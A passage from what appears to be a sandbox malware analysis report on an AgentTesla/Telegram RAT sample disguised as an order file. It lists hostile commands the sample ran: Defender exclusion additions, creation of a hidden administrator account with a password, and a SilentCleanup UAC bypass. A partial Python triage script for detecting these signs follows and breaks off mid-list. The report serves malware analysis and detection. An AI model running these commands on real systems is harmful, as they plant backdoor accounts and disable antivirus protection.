                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
                              IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                              Sections

                              Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy         | Characteristics
                              .text  | 0x2000          | 0xc608f      | 0xc6200  | False    | 0.937400187303  | data      | 7.93856030024   | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rsrc  | 0xca000         | 0x7cf2       | 0x7e00   | False    | 0.498387896825  | data      | 6.40175519141   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc | 0xd2000         | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              Name       | RVA     | Size   | Type | Language | Country
                              IBC        | 0xca0c4 | 0x7736 | data |          |
                              RT_VERSION | 0xd17fc | 0x4f6  | data |          |

                              Imports

                              DLL         | Import
                              mscoree.dll | _CorExeMain

                              Version Infos

                              Description      | Data
                              Translation      | 0x0000 0x04b0
                              LegalCopyright   | Microsoft Corporation. All rights reserved.
                              Assembly Version | 16.0.0.0
                              InternalName     | Microsoft.VisualStudio.Language.Intellisense.dll
                              FileVersion      | 16.6.255.35071
                              CompanyName      | Microsoft Corporation
                              LegalTrademarks  |
                              Comments         | Microsoft Visual Studio Editor Platform
                              ProductName      | Microsoft Visual Studio
                              ProductVersion   | 16.6.255+ff88cb6b00.RR
                              FileDescription  | Microsoft.VisualStudio.Language.Intellisense
                              OriginalFilename | Microsoft.VisualStudio.Language.Intellisense.dll

                              Network Behavior

                              Network Port Distribution

                              UDP Packets

                              Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                              Jan 14, 2022 05:34:59.250521898 CET | 56534       | 53        | 192.168.2.4 | 8.8.8.8
                              Jan 14, 2022 05:34:59.269767046 CET | 53          | 56534     | 8.8.8.8     | 192.168.2.4

                              DNS Queries

                              Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name             | Type           | Class
                              Jan 14, 2022 05:34:59.250521898 CET | 192.168.2.4 | 8.8.8.8 | 0x8a6b   | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

                              DNS Answers

                              Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name             | CName | Address         | Type           | Class
                              Jan 14, 2022 05:34:59.269767046 CET | 8.8.8.8   | 192.168.2.4 | 0x8a6b   | No error (0) | api.telegram.org |       | 149.154.167.220 | A (IP address) | IN (0x0001)

                              Code Manipulations

                              Statistics

                              Behavior

                              System Behavior

                              General

                              Start time:05:32:26
                              Start date:14/01/2022
                              Path:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                              Imagebase:0xdf0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              Reputation:low

                              General

                              Start time:05:32:30
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              General

                              Start time:05:32:30
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:05:32:31
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:32
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:05:32:33
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:33
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:34
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:05:32:34
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:35
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup users "user" /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:36
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:05:32:36
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup users "user" /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:37
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup administrators "user" /del
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:38
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:38
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup administrators "user" /del
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:39
                              Start date:14/01/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                              Imagebase:0x7ff6eb840000
                              File size:51288 bytes
                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:39
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                              Imagebase:0x10a0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:40
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:41
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:05:32:42
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:05:32:42
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:43
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:43
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:05:32:44
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:51
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                              Imagebase:0x1823aae0000
                              File size:173672 bytes
                              MD5 hash:2778AE0EB674B74FF8028BF4E51F1DF5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:53
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Imagebase:0xfd0000
                              File size:45160 bytes
                              MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                              General

                              Start time:05:32:54
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                              Imagebase:0xbf0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 19%, ReversingLabs

                              General

                              Start time:05:32:56
                              Start date:14/01/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                              Imagebase:0x7ff6eb840000
                              File size:51288 bytes
                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:33:02
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:05:33:02
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:33:03
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                              Imagebase:0xfb0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security

                              General

                              Start time:05:33:09
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Imagebase:0xbe0000
                              File size:45160 bytes
                              MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
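
The process records above carry three indicators a responder would want to pull out automatically: `svchost.exe` running from a freshly created `C:\Windows\Microsoft.NET\Framework\<random>\` directory instead of `System32`/`SysWOW64` (the dropped copy has the same MD5 as the submitted sample), a directory name made of random letters, and a `powershell.exe Add-MpPreference -ExclusionPath ... -Force` command that whitelists that exact binary in Windows Defender. The following Python is an added example and not part of the Joe Sandbox report: it triages the report's own Path/Commandline records (constructed inline from the listing above) with those three checks. The field names, the expected-directory table and the random-name heuristic are assumptions of this example.

```python
"""Added example (not from the Joe Sandbox report): triage the process
records listed above for masquerading, random directories and Defender
exclusion tampering."""
import re
from pathlib import PureWindowsPath

# Constructed from the report's own Path / Commandline lines (the duplicate
# svchost.exe and conhost.exe records are listed once).
REPORT_PROCESSES = [
    {"path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"},
    {"path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"},
    {"path": r"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"'},
    {"path": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
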